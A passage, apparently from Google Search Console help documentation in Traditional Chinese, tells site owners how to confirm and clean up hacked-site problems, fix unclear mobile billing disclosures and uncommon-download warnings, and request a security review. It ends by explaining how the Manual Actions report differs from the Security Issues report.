如要在遭到駭客入侵時自行修正問題,請參閱建立支援小組一文,瞭解您可能需要採取的行動,或如何在問題超出您能力所及的情況下尋求協助。

3. 確認問題

 

查看您網站上的部分示例網頁,確認其中是否有這類下載內容。在某些情況下,駭客如果認為您是網站擁有者,就會刻意隱藏這類連結,因此請嘗試利用網址檢查工具存取示例網址,或者透過其他帳戶或電腦進行登入。

4. 清理您的網站

參閱遭入侵網站協助指南,按照完整流程徹底修正您的網站。這份指南提供了清理作業的相關步驟和提示,有助於防止網站再次遭到入侵。當您準備開始清理網站時,可以選擇利用最後一個正常備份替換受影響的檔案,或是自行移除垃圾資訊相關內容。

5. 確認修正後的結果

確認您的網站已符合垃圾軟體政策規定。

6. 要求審查

確認網站上的問題已獲得修正後,請在安全性問題報告中提出安全性審查要求。審查程序可能需要幾天至幾週的時間。

行動付款資訊標示不清

Google 偵測到您的網站未充分向使用者說明會產生行動付款的情況,因此 Chrome 可能會在使用者載入有這類情況的網頁前顯示警告。

1. 確認問題

前往報告中列出的示例網址,查看哪些網頁有行動付款資訊標示不清的情況。您也可以參閱這篇行動付款資訊指南

2. 修正問題

按照行動付款資訊的最佳做法修正網站。

3. 要求審查

確認網站上的問題已獲得修正後,請在安全性問題報告中提出安全性審查要求。審查程序可能需要幾天至幾週的時間。

不尋常的下載內容

您的網站提供了 Google 安全瀏覽服務未曾見過的下載內容。Chrome 瀏覽器可能會顯示警告,說明這個不尋常的下載檔案可能具有危險性。只要該檔案通過 Google 安全瀏覽服務的安全性驗證,系統就會自動移除警告。請注意,系統不一定會針對這類問題提供示例網址。

這類問題不會導致您的網頁或網站無法顯示在 Google 搜尋結果中,但使用者初次要求下載未知的檔案時,Chrome 瀏覽器會顯示警告訊息。

1. 修正問題

找出您提供的下載內容,並確認該內容是否符合下載規範

  • 如果您的網站上有任何下載內容違反這些規範,請加以移除。
  • 如果下載內容並未違反規範,則不須移除。

2. 要求審查

將檔案移除完畢或確認您提供的下載內容皆符合下載規範後,請在安全性問題報告中提出安全性審查要求。審查程序可能需要幾天至幾週的時間。即使您並未提出審查要求,Google 還是會評估大部分下載內容,並將其劃分成「可接受」或「有害」兩種類別。不過,提交審查要求能讓評估程序更快完成。

 

「專人介入處理」報告和「安全性問題」報告有何差異?

「專人介入處理報告」列為有問題的網頁或網站通常都會嘗試操控搜尋索引功能,但未必會對使用者造成危險。多數在這裡列出的問題會造成網頁或網站排名較低,或無法在搜尋結果中顯示 (使用者不會收到相關提示)。

「安全性問題報告」則會列出網站遭到入侵的跡象,或網站可能會對造訪者或電腦造成嚴重影響的行為 (例如網路詐騙攻擊,或在使用者電腦安裝惡意軟體或垃圾軟體)。使用者在搜尋結果中查看這些網頁時會看到警告標籤,或在嘗試造訪這些網頁時看到瀏覽器所顯示的插頁式警告網頁。

這對您有幫助嗎?
我們應如何改進呢?